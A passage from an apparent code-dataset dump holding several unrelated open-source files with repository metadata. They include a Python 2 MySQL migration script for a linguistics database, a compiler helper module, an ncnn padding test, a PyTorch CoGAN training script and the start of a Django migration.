update = elicitationmethod_table.update().where(elicitationmethod_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_file_table(engine, file_table):
"""Fix the file table: if the file has a url value, append it to the description
value and delete it from the url value; otherwise, set the filename value to the name value.
"""
print_('Fixing the file table ... ')
msgs = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
files = engine.execute(file_table.select()).fetchall()
buffer1 = []
for row in files:
values = row2dict(row)
if row['url']:
values['url'] = ''
values['description'] = '%s %s' % (row['description'], row['url'])
            msgs.append('''WARNING: the url/embeddedFileMarkup value of file %d has been appended
to its description value. Please alter this file by hand so that it has
an appropriate url value'''.replace('\n', ' ') % row['id'])
buffer1.append(values)
else:
values['filename'] = row['name']
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = file_table.update().where(file_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_form_table(engine, form_table, formbackup_table, user_table, default_morphemes):
"""Give UUID, modifier_id values to the form table. Also give UUID values to
all form backups that are backups of existing forms.
:param bool default_morphemes: if True, then forms that have no morpheme_break and no morpheme_gloss
and whose transcription contains no space will receive a default morpheme_break value (the value
of the transcription attribute) and a default morpheme_gloss value (the value of the first translation
transcription with spaces replaced by periods).
.. note::
There is a somewhat nasty complication that arises because of a change
in how backupers/modifiers are recorded with backups. In the OLD 0.2.7, every
time a backup occurs, the backuper value of the backup is set to the user who
made the backup and this information is not stored in the original. In the OLD 1.0,
creates, updates and deletes all set the modifier value to the user who performed
the action and then this info is copied to the modifier value of the backup. Thus we
must perform the following transformations:
for form in forms:
if forms has a backuper
then it has been updated, so we should
                set its modifier to the user referenced in the backuper attribute of its most recent backup
else
then it was created but never updated or deleted, so we should
set its modifier to its enterer
for formbackup in formbackups:
if there are older backups of the same form
then set the modifier of the present formbackup to the backuper value of the most recent such sister backup
else
this is the first backup and its modifier should be its enterer
"""
print_('Fixing the form table ... ')
msgs = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
users = engine.execute(user_table.select()).fetchall()
formbackups = engine.execute(formbackup_table.select()).fetchall()
if default_morphemes:
translations = dict([(row['form_id'], row['transcription']) for row in
engine.execute(translation_table.select().order_by(translation_table.c.id.desc())).fetchall()])
form_update_cache = []
formbackup_update_cache = []
for row in engine.execute(form_table.select()):
values = row2dict(row)
values['UUID'] = str(uuid4())
if default_morphemes and not values['morpheme_break'] and not values['morpheme_gloss'] and ' ' not in values['transcription']:
values['morpheme_break'] = values['transcription']
values['morpheme_gloss'] = translations[values['id']].replace(' ', '.')
backups = sorted([fb for fb in formbackups if fb['form_id'] == row['id']],
key=lambda fb: fb['datetime_modified'])
if backups:
try:
most_recent_backuper = json.loads(backups[-1]['backuper'])['id']
if [u for u in users if u['id'] == most_recent_backuper]:
values['modifier_id'] = most_recent_backuper
else:
values['modifier_id'] = row['enterer_id']
msgs.append('WARNING: there is no user %d to serve as the most recent backuper for form %d' % (most_recent_backuper, row['id']))
except Exception:
msgs.append('''WARNING: there are %d backups for form %d; however,
it was not possible to extract a backuper from the most recent one (backuper value: %s)'''.replace('\n', ' ') % (
len(backups), row['id'], backups[-1]['backuper']))
values['modifier_id'] = row['enterer_id']
else:
values['modifier_id'] = row['enterer_id']
form_update_cache.append(values)
for fb in backups:
formbackup_update_cache.append({'fb_id': fb['id'], 'UUID': values['UUID']})
engine.execute('set names utf8;')
if form_update_cache:
update = form_table.update().where(form_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in form_update_cache[0] if k not in ('id', 'id_')]))
engine.execute(update, form_update_cache)
if formbackup_update_cache:
update = formbackup_table.update().where(formbackup_table.c.id==bindparam('fb_id')).values(UUID=bindparam('UUID'))
engine.execute(update, formbackup_update_cache)
print 'done.'
return msgs
def fix_formbackup_table(engine, formbackup_table):
"""Give each form a modifier value and (potentially) a UUID value also (if it doesn't have one)."""
print_('Fixing the formbackup table ... ')
uuidless = {} # maps form ids to UUIDs
buffer1 = []
formbackups = engine.execute(formbackup_table.select()).fetchall()
for row in formbackups:
values = row2dict(row)
backups = sorted([fb for fb in formbackups if fb['form_id'] == values['form_id']],
key=lambda fb: fb['datetime_modified'])
if backups:
most_recent_backuper = backups[-1]['backuper']
values['modifier'] = most_recent_backuper
else:
values['modifier'] = values['enterer']
if values['UUID'] is None:
uuid = uuidless.get(row['form_id'], uuid4())
uuidless[row['form_id']] = uuid
values['UUID'] = uuid
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
        update = formbackup_table.update().where(formbackup_table.c.id==bindparam('id_')).\
            values(UUID=bindparam('UUID'), modifier=bindparam('modifier'))
engine.execute(update, buffer1)
print 'done.'
def fix_language_table(engine, language_table):
"""Unicode-normalize and UTF-8-ify the data in the language table."""
print_('Fixing the language table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(language_table.select()):
values = row2dict(row)
values['Id_'] = values['Id']
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = language_table.update().where(language_table.c.Id==bindparam('Id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('Id', 'Id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_translation_table(engine, translation_table):
"""Unicode-normalize and UTF-8-ify the data in the translation table."""
print_('Fixing the translation table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(translation_table.select()):
values = row2dict(row)
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = translation_table.update().where(translation_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_page_table(engine, page_table):
print_('Fixing the page table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(page_table.select()):
values = row2dict(row)
values['html'] = rst2html(values['content'])
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = page_table.update().where(page_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_phonology_table(engine, phonology_table, phonologybackup_table, user_table):
"""Give each phonology UUID and modifier_id values; also give the phonology backups of
existing phonologies UUID values.
"""
print_('Fixing the phonology table ... ')
msgs = []
#engine.execute('set names latin1')
engine.execute('set names utf8;')
users = engine.execute(user_table.select()).fetchall()
phonologybackups = engine.execute(phonologybackup_table.select()).fetchall()
buffer1 = []
buffer2 = []
for row in engine.execute(phonology_table.select()):
values = row2dict(row)
values['UUID'] = str(uuid4())
backups = sorted([pb for pb in phonologybackups if pb['phonology_id'] == values['id']],
key=lambda pb: pb['datetime_modified'])
if backups:
try:
most_recent_backuper = json.loads(backups[-1]['backuper'])['id']
if [u for u in users if u['id'] == most_recent_backuper]:
values['modifier_id'] = most_recent_backuper
else:
values['modifier_id'] = values['enterer_id']
msgs.append('There is no user %d to serve as the most recent backuper for phonology %d' % (most_recent_backuper, values['id']))
except Exception:
msgs.append('''WARNING: there are %d backups for phonology %d; however,
it was not possible to extract a backuper from the most recent one (backuper value: %s)'''.replace('\n', ' ') % (
len(backups), values['id'], backups[-1]['backuper']))
values['modifier_id'] = values['enterer_id']
else:
values['modifier_id'] = values['enterer_id']
buffer1.append(values)
        for pb in backups:
            buffer2.append({'pb_id': pb['id'], 'UUID': values['UUID']})
    if buffer2:
        update = phonologybackup_table.update().where(phonologybackup_table.c.id==bindparam('pb_id')).\
            values(UUID=bindparam('UUID'))
        engine.execute(update, buffer2)
if buffer1:
engine.execute('set names utf8;')
update = phonology_table.update().where(phonology_table.c.id==bindparam('id_')).\
values(modifier_id=bindparam('modifier_id'), UUID=bindparam('UUID'))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_phonologybackup_table(engine, phonologybackup_table):
"""Provide each phonology backup with a modifier value and (potentially) a UUID value too."""
print_('Fixing the phonologybackup table ... ')
uuidless = {} # maps phonology ids to UUIDs
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
phonologybackups = engine.execute(phonologybackup_table.select()).fetchall()
for row in phonologybackups:
values = row2dict(row)
backups = sorted([pb for pb in phonologybackups if pb['phonology_id'] == values['phonology_id']],
key=lambda pb: pb['datetime_modified'])
if backups:
most_recent_backuper = backups[-1]['backuper']
values['modifier'] = most_recent_backuper
else:
values['modifier'] = row['enterer']
if row['UUID'] is None:
uuid = uuidless.get(row['phonology_id'], uuid4())
uuidless[row['phonology_id']] = uuid
values['UUID'] = uuid
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = phonologybackup_table.update().where(phonologybackup_table.c.id==bindparam('id_')).\
values(UUID=bindparam('UUID'), modifier=bindparam('modifier'))
engine.execute(update, buffer1)
print 'done.'
def fix_tag_table(engine, tag_table):
"""Warn the user about duplicate tags."""
print_('Fixing the tag table ... ')
msgs = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
tags = [row['name'] for row in engine.execute(tag_table.select()).fetchall()]
duplicate_tags = set([x for x in tags if len([y for y in tags if y == x]) > 1])
for dt in duplicate_tags:
msgs.append('There is more than one tag named "%s"; please manually change the name of one of them.' % dt)
buffer1 = []
for row in engine.execute(tag_table.select()):
values = row2dict(row)
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = tag_table.update().where(tag_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_source_table(engine, source_table):
"""Create an author value and put the fullReference value in the annote field.
Return a message explaining what was done.
"""
print_('Fixing the source table ... ')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(source_table.select()):
values = row2dict(row)
first_name = values['authorFirstName']
last_name = values['authorLastName']
if first_name and last_name:
author = '%s %s' % (first_name, last_name)
else:
author = None
values['author'] = author
values['annote'] = values['fullReference']
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = source_table.update().where(source_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return ['''Sources have been updated.
An author value was constructed using the authorFirstName and authorLastName values.
The fullReference value was moved to the annote attribute.
    The sources will need to be updated manually.'''.replace('\n', ' ')]
def fix_speaker_table(engine, speaker_table):
"""Generate an html value for each speaker."""
print_('Fixing the speaker table ... ')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(speaker_table.select()):
values = row2dict(row)
values['html'] = rst2html(values['page_content'])
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = speaker_table.update().where(speaker_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_syntacticcategory_table(engine, syntacticcategory_table):
print_('Fixing the syntactic category table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(syntacticcategory_table.select()):
values = row2dict(row)
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = syntacticcategory_table.update().where(syntacticcategory_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def cleanup_db(mysql_db_name, mysql_cleanup_script, mysql_updater, mysql_username, mysql_password):
"""Run the MySQL cleanup script against the db (cf. cleanup_SQL for the contents of this script)."""
print_('Cleaning up ... ')
mysql_script_content = '#!/bin/sh\nmysql -u %s -p%s %s < %s' % (mysql_username, mysql_password, mysql_db_name, mysql_cleanup_script)
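    # The generated shell script looks like this (hypothetical credentials):
    #   #!/bin/sh
    #   mysql -u old_user -psecret old_db < /path/to/old_cleanup_db_0.2.7_1.0a1.sql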
with open(mysql_updater, 'w') as f:
f.write(mysql_script_content)
with open(os.devnull, 'w') as devnull:
subprocess.call([mysql_updater], shell=False, stdout=devnull, stderr=devnull)
print 'done.'
def getOrthographyReferenced(crappyReferenceString, row, orthographies):
"""Return the id of the orthography model referenced in ``crappyReferenceString``.
``crappyReferenceString`` is something like "Orthography 1" or "Object Language Orthography 3"
and ``row`` is a row in the applicationsettings table. ``orthographies`` is a dict from
orthography names to orthography ids.
"""
orthographyName = row['objectLanguageOrthography%sName' % crappyReferenceString.split()[-1]]
return orthographies.get(orthographyName, None)
def rst2html(string):
"""Covert a restructuredText string to HTML."""
try:
return publish_parts(unicode(string, 'utf8'), writer_name='html',
settings_overrides={'report_level':'quiet'})['html_body'].encode('utf8')
except:
return string
def generateSalt():
return str(uuid4().hex)
def encryptPassword(password, salt):
"""Use PassLib's pbkdf2 implementation to generate a hash from a password.
Cf. http://packages.python.org/passlib/lib/passlib.hash.pbkdf2_digest.html#passlib.hash.pbkdf2_sha512
"""
return pbkdf2_sha512.encrypt(password, salt=salt)
def generatePassword(length=12):
"""Generate a random password containing 3 UC letters, 3 LC ones, 3 digits and 3 symbols."""
lcLetters = string.letters[:26]
ucLetters = string.letters[26:]
digits = string.digits
symbols = string.punctuation.replace('\\', '')
password = [choice(lcLetters) for i in range(3)] + \
[choice(ucLetters) for i in range(3)] + \
[choice(digits) for i in range(3)] + \
[choice(symbols) for i in range(3)]
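    # The result is always a 12-character password such as 'kQ3#xR7!mT9%' (illustrative
    # only; output is random). Note that the ``length`` argument is currently unused.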
shuffle(password)
return ''.join(password)
def normalize_(unistr):
"""Return a unistr using decompositional normalization (NFD)."""
try:
return unicodedata.normalize('NFD', unistr)
except TypeError:
return unicodedata.normalize('NFD', unicode(unistr))
except UnicodeDecodeError:
return unistr
def parse_arguments(arg_list):
result = {}
map_ = {'-d': 'mysql_db_name', '-u': 'mysql_username', '-p': 'mysql_password',
'-f': 'mysql_dump_file', '--default-morphemes': 'default_morphemes'}
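    # Example with hypothetical values: the argument list
    #   ['-d', 'old_db', '-u', 'old_user', '-p', 'secret', '--default-morphemes']
    # parses to {'mysql_db_name': 'old_db', 'mysql_username': 'old_user',
    #            'mysql_password': 'secret', 'default_morphemes': True}.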
iterator = iter(arg_list)
try:
for element in iterator:
if element in map_:
if element == '--default-morphemes':
result[map_[element]] = True
else:
result[map_[element]] = iterator.next()
except Exception:
pass
if len(set(['mysql_db_name', 'mysql_username', 'mysql_password']) & set(result.keys())) != 3:
        sys.exit('Usage: python old_update_db_0.2.7_1.0a1.py -d mysql_db_name -u mysql_username -p mysql_password [-f mysql_dump_file] [--default-morphemes]')
return result
if __name__ == '__main__':
# User must supply values for mysql_db_name, mysql_username and mysql_password.
# optional argument: -p mysql_dump_file: path to a dump file
# optional argument: --default-morphemes: if present, default morphemes will be generated (see below)
arguments = parse_arguments(sys.argv[1:])
mysql_dump_file = arguments.get('mysql_dump_file')
mysql_db_name = arguments.get('mysql_db_name')
mysql_username = arguments.get('mysql_username')
mysql_password = arguments.get('mysql_password')
default_morphemes = arguments.get('default_morphemes', False)
# The SQLAlchemy/MySQLdb/MySQL connection objects
sqlalchemy_url = 'mysql://%s:%s@localhost:3306/%s' % (mysql_username, mysql_password, mysql_db_name)
engine = create_engine(sqlalchemy_url)
try:
engine.execute('SHOW TABLES;').fetchall()
except Exception:
sys.exit('Error: the MySQL database name, username and password are not valid.')
meta = MetaData()
now = datetime.datetime.utcnow()
now_string = now.isoformat().replace('T', ' ').split('.')[0]
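    # now_string is a MySQL-friendly UTC timestamp, e.g. '2013-05-14 20:31:55'
    # (isoformat with the 'T' replaced by a space and the microseconds dropped).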
here = os.path.dirname(os.path.realpath(__file__))
# The shell script that will be used multiple times to load the MySQL scripts below
mysql_updater_name = 'tmp.sh'
mysql_updater = write_updater_executable(mysql_updater_name, here)
# The executable that does the preliminary update
mysql_update_script_name = 'old_update_db_0.2.7_1.0a1.sql'
mysql_update_script = write_update_executable(mysql_update_script_name, here)
# The executable that fixes the character set
mysql_charset_script_name = 'old_charset_db_0.2.7_1.0a1.sql'
mysql_charset_script = write_charset_executable(mysql_charset_script_name, here)
# The executable that performs the final clean up
mysql_cleanup_script_name = 'old_cleanup_db_0.2.7_1.0a1.sql'
mysql_cleanup_script = write_cleanup_executable(mysql_cleanup_script_name, here)
# If a dump file path was provided, recreate the db using it.
if mysql_dump_file:
if os.path.isfile(mysql_dump_file):
recreate_database(mysql_db_name, mysql_dump_file, mysql_username, mysql_password, mysql_updater)
else:
sys.exit('Error: there is no such dump file %s' % os.path.join(os.getcwd(), mysql_dump_file))
# Get info about the database
db_charset, table_collations, columns = get_database_info(mysql_db_name, mysql_username, mysql_password)
# Change the character set to UTF-8
change_db_charset_to_utf8(mysql_db_name, mysql_charset_script, mysql_username, mysql_password,
mysql_updater, db_charset, table_collations, columns)
# Perform the preliminary update of the database using ``mysql_update_script``
perform_preliminary_update(mysql_db_name, mysql_update_script, mysql_username, mysql_password, mysql_updater)
# Get info about the database post utf8 conversion
db_charset_new, table_collations_new, columns_new = get_database_info(mysql_db_name, mysql_username, mysql_password)
##################################################################################
# Now we update the values of the newly modified database Pythonically
##################################################################################
applicationsettings_table = Table('applicationsettings', meta, autoload=True, autoload_with=engine)
collection_table = Table('collection', meta, autoload=True, autoload_with=engine)
collectionbackup_table = Table('collectionbackup', meta, autoload=True, autoload_with=engine)
elicitationmethod_table = Table('elicitationmethod', meta, autoload=True, autoload_with=engine)
file_table = Table('file', meta, autoload=True, autoload_with=engine)
form_table = Table('form', meta, autoload=True, autoload_with=engine)
formbackup_table = Table('formbackup', meta, autoload=True, autoload_with=engine)
language_table = Table('language', meta, autoload=True, autoload_with=engine)
orthography_table = Table('orthography', meta, autoload=True, autoload_with=engine)
page_table = Table('page', meta, autoload=True, autoload_with=engine)
phonology_table = Table('phonology', meta, autoload=True, autoload_with=engine)
phonologybackup_table = Table('phonologybackup', meta, autoload=True, autoload_with=engine)
source_table = Table('source', meta, autoload=True, autoload_with=engine)
speaker_table = Table('speaker', meta, autoload=True, autoload_with=engine)
syntacticcategory_table = Table('syntacticcategory', meta, autoload=True, autoload_with=engine)
tag_table = Table('tag', meta, autoload=True, autoload_with=engine)
translation_table = Table('translation', meta, autoload=True, autoload_with=engine)
user_table= Table('user', meta, autoload=True, autoload_with=engine)
messages = []
fix_orthography_table(engine, orthography_table, table_collations['application_settings'])
messages += fix_applicationsettings_table(engine, applicationsettings_table, user_table, now_string, table_collations)
messages += fix_user_table(engine, user_table)
messages += fix_collection_table(engine, collection_table, collectionbackup_table, user_table)
fix_collectionbackup_table(engine, collectionbackup_table)
fix_elicitationmethod_table(engine, elicitationmethod_table)
messages += fix_file_table(engine, file_table)
messages += fix_form_table(engine, form_table, formbackup_table, user_table, default_morphemes)
fix_formbackup_table(engine, formbackup_table)
fix_language_table(engine, language_table)
fix_page_table(engine, page_table)
messages += fix_phonology_table(engine, phonology_table, phonologybackup_table, user_table)
fix_phonologybackup_table(engine, phonologybackup_table)
messages += fix_tag_table(engine, tag_table)
messages += fix_source_table(engine, source_table)
fix_speaker_table(engine, speaker_table)
fix_syntacticcategory_table(engine, syntacticcategory_table)
fix_translation_table(engine, translation_table)
cleanup_db(mysql_db_name, mysql_cleanup_script, mysql_updater, mysql_username, mysql_password)
os.remove(mysql_updater)
print 'OK'
print '\n\n%s' % '\n\n'.join(messages)
print '\nFinally, you should request forms.update_morpheme_references in order to generate valid break_gloss_category values and to regenerate the other morpheme-related values.\n\n'
# TODO: what to do about files without lossy copies? Create an admin-only method of the forms controller that creates
# lossy copies for all relevant files that lack such.
# TODO: make sure that file names match the names of the files on the file system, i.e., post normalization...
# TODO: verify user.input_orthography_id and user.output_orthography_id on an app that has specifications for these
# TODO: search a live OLD app and make sure that the normalization has worked...
# TODO: dump the schema of an altered db and make sure it matches that of a system-generated one (e.g., old_test)
# Post-processing:
# 1. serve the system and request form.update_morpheme_references in order to, well, do that ...
# 2. find all forms and collections that lack enterers and give them a default enterer (cf. the BLA OLD).
# Then find all forms and collections lacking modifiers and give them the value of their enterers.
| [
"[email protected]"
] | |
f6e48ed453acfeacb2bc7ce5b0987480f39bf064 | 225a1d5fca742ae4f502bc346e26d804283e925e | /luna/shortcuts.py | eb802ebf4837f5a06844a562249863d1b76f2dc0 | [
"MIT"
] | permissive | y372465774/luna | 8ad056fdd956c9fa5508d6d3a657b76785e9641d | ee3bb740f2cee67fa84b3e923979d29fd14015a7 | refs/heads/master | 2021-06-21T12:43:09.821262 | 2017-06-03T23:11:47 | 2017-06-03T23:11:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | from luna import util
from luna.compiler import Compiler
from luna.parser import Parser
def compile(filepath):
tree = parse(filepath)
compiler = Compiler()
return compiler.compile(tree)
def interpret(filepath):
frame = compile(filepath)
frame.run()
def parse(filepath):
import os
content = filepath
if os.path.isfile(filepath):
content = util.read(filepath)
parser = Parser()
return parser.parse_with_rule(None, content)
| [
"[email protected]"
] | |
d2e678f126fa9f4a2b06d9a9db003b86dc26c0cb | d668209e9951d249020765c011a836f193004c01 | /tools/pnnx/tests/ncnn/test_F_pad.py | 88590649883cbbc978a447b89328a1e6e6372751 | [
"BSD-3-Clause",
"Zlib",
"BSD-2-Clause"
] | permissive | Tencent/ncnn | d8371746c00439304c279041647362a723330a79 | 14b000d2b739bd0f169a9ccfeb042da06fa0a84a | refs/heads/master | 2023-08-31T14:04:36.635201 | 2023-08-31T04:19:23 | 2023-08-31T04:19:23 | 95,879,426 | 18,818 | 4,491 | NOASSERTION | 2023-09-14T15:44:56 | 2017-06-30T10:55:37 | C++ | UTF-8 | Python | false | false | 2,062 | py | # Tencent is pleased to support the open source community by making ncnn available.
#
# Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
def forward(self, x, y, z):
x = F.pad(x, (3,4), mode='constant', value=1.3)
x = F.pad(x, (2,2))
y = F.pad(y, (5,6), mode='reflect')
y = F.pad(y, (2,1), mode='replicate')
y = F.pad(y, (3,4), mode='constant', value=1.3)
y = F.pad(y, (1,1))
z = F.pad(z, (3,4,3,4), mode='reflect')
z = F.pad(z, (2,1,2,0), mode='replicate')
z = F.pad(z, (1,0,2,0), mode='constant', value=1.3)
z = F.pad(z, (3,3,3,3))
return x, y, z
def test():
net = Model()
net.eval()
torch.manual_seed(0)
x = torch.rand(1, 16)
y = torch.rand(1, 2, 16)
z = torch.rand(1, 3, 12, 16)
a = net(x, y, z)
# export torchscript
mod = torch.jit.trace(net, (x, y, z))
mod.save("test_F_pad.pt")
# torchscript to pnnx
import os
os.system("../../src/pnnx test_F_pad.pt inputshape=[1,16],[1,2,16],[1,3,12,16]")
# ncnn inference
import test_F_pad_ncnn
b = test_F_pad_ncnn.test_inference()
for a0, b0 in zip(a, b):
if not torch.allclose(a0, b0, 1e-4, 1e-4):
return False
return True
if __name__ == "__main__":
if test():
exit(0)
else:
exit(1)
| [
"[email protected]"
] | |
ed20f0ff5ef0931674df3d3cb706768578fb1f47 | 28225a61f2fc33e4f6d56a1941a99301489c0f1e | /GAN/CoGAN(WIP)/main.py | 34036d03559776a7b713da6c23fac7aa13909638 | [] | no_license | sailfish009/pytorchTutorialRepo | 97cb4368b6ac22bd678965d351196b47d52970e1 | 17d67e64555d2b219d7d53de6a7bfda4172b809b | refs/heads/master | 2023-03-08T13:03:57.244087 | 2021-02-23T11:26:19 | 2021-02-23T11:26:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,696 | py | import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
from tqdm import tqdm
from trainer import *
import torchvision.models as models
import mnistm
import os
os.environ["TORCH_HOME"] = "~/Desktop/Datasets/"
# Allowing arguments for direct execution from terminal
parser = argparse.ArgumentParser()
parser.add_argument('--data', help = "folder for custom training", default = "")
parser.add_argument('--arch', default = 'resnet18', help= '''Choose any model
from pytorch. Or input "my" for taking a model from
model.py ''')
parser.add_argument("--weight-decay", default = 1e-4, help = "weight decay coefficient")
parser.add_argument("--resume", default = False, help = "Resume training from a checkpoint")
parser.add_argument("--pretrained", default = False, help = "If part of the standard datasets, downloaded pretrained weights")
parser.add_argument('--batch-size', type = int, default = 128, help = 'input batch size')
parser.add_argument(
"--test-batch-size", type = int, default = 1000
)
parser.add_argument(
"--epochs", type = int, default = 20, help = "no of epochs to train for"
)
parser.add_argument(
"--lr", type = float, default = 0.01, help = "Base learning rate"
)
parser.add_argument(
"--max_lr", type = float, default = 0.1, help = "Max learning rate for OneCycleLR"
)
parser.add_argument(
"--dry-run", action = 'store_true', default = False, help = 'quickly check a single pass'
)
parser.add_argument(
"--seed", type = int, default = 100, help = "torch random seed"
)
parser.add_argument(
"--log_interval", type = int, default = 20, help = "interval to show results"
)
parser.add_argument(
"--save-model", action = 'store_true', default = True, help = "Choose if model to be saved or not"
)
parser.add_argument("--save_path", default = "models/model.pt", help = "Choose model saved filepath")
# GAN specific args
parser.add_argument("--nz", default = 100, help = "size of latent vector")
parser.add_argument("--ngf", default = 28, help = "gen size")
parser.add_argument("--ndf", default = 28, help= "Discriminator size")
parser.add_argument("--beta1", default = 0.5, help = "adam beta1 parameter")
parser.add_argument('--CRITIC_ITERS', default=1, type=int, help='D update iters before G update')
parser.add_argument("--nc", default =1, help = "number of image channels")
args = parser.parse_args()
# Setting params
nz = int(args.nz)
ngf = int(args.ngf)
ndf = int(args.ndf)
nc = int(args.nc)
torch.manual_seed(args.seed)
device = torch.device("cuda")
kwargs = {'batch_size':args.batch_size}
kwargs.update(
{'num_workers':8,
'pin_memory':True,
'shuffle': True
}
)
# Defining batch transforms
transform = transforms.Compose(
[transforms.Resize(28),
transforms.ToTensor(),
transforms.Normalize([0.5], [0.5])
# transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
]
)
# Loading dataset
train_data = datasets.MNIST("~/Desktop/Datasets/", transform =
transform)
train_loader = torch.utils.data.DataLoader(train_data, **kwargs)
train_loader2 = torch.utils.data.DataLoader(
mnistm.MNISTM(
"~/Desktop/Datasets/",
train=True,
download=True,
transform=transforms.Compose(
[
transforms.Resize(ndf),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
),
),
batch_size=args.batch_size,
shuffle=True,
)
# Initialize weights
def weight_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
torch.nn.init.normal_(m.weight, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
torch.nn.init.normal_(m.weight, 1.0, 0.02)
torch.nn.init.zeros_(m.bias)
# Loading model
num_classes = 10 #This is new; change it based on dataset
if args.arch == "my":
from Nets import *
netG = Generator(num_classes, (nc, ndf, ndf), args).to(device)
netG.apply(weight_init)
netD = Discriminator(num_classes, (nc, ndf, ndf), args).to(device)
netD.apply(weight_init)
print("Using custom architecture")
else:
if args.pretrained:
print(f"Using pretrained {args.arch}")
model = models.__dict__[args.arch](pretrained = True)
else:
print(f"Not using pretrained {args.arch}")
model = models.__dict__[args.arch]()
print("Generator", netG)
print("Discriminator", netD)
start_epoch = 1
if args.resume:
loc = "cuda:0"
checkpointD = torch.load(args.save_path+"dis.pt", map_location = loc)
checkpointG = torch.load(args.save_path+"gen.pt", map_location = loc)
    # Assumes the checkpoints were saved as dicts holding 'state_dict' and 'epoch' keys.
    netD.load_state_dict(checkpointD['state_dict'])
    netG.load_state_dict(checkpointG['state_dict'])
    start_epoch = checkpointD['epoch']
    print(f"Done loading pretrained, Start epoch: {start_epoch}")
# Optimizers
optimizerD = optim.Adam(netD.parameters(), lr=args.lr,betas=(args.beta1, 0.999))
optimizerG = optim.Adam(netG.parameters(), lr=args.lr,betas=(args.beta1, 0.999))
# Loop
batches_done = 0
for epoch in tqdm(range(start_epoch, args.epochs+1)):
train(args, device, train_loader,train_loader2, epoch, netD, netG,nz , ndf, nc, optimizerD, optimizerG, batches_done, num_classes)
if args.save_model:
torch.save(netD.state_dict(), args.save_path+"disc.pt")
torch.save(netG.state_dict(), args.save_path+"gen.pt")
| [
"[email protected]"
] | |
9bcc59034c881a3c1b6c4c6e4be0b400fa0191b6 | d8da64ecb3a88f8f3196937d3836c7bbafd5e26f | /backend/home/migrations/0002_load_initial_data.py | 5ac5736cbfb33d2462efd03c2c2be03900aba58d | [] | no_license | crowdbotics-apps/layouteditor151-1654 | 990b395d8054e05b0f8739345d5e55623cead88c | 75e3614856ab5577da68e9ec4ad0157f462abd6d | refs/heads/master | 2022-11-16T05:09:59.518254 | 2020-07-03T17:54:23 | 2020-07-03T17:54:23 | 276,958,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
CustomText = apps.get_model("home", "CustomText")
customtext_title = "layouteditor151"
CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
HomePage = apps.get_model("home", "HomePage")
homepage_body = """
<h1 class="display-4 text-center">layouteditor151</h1>
<p class="lead">
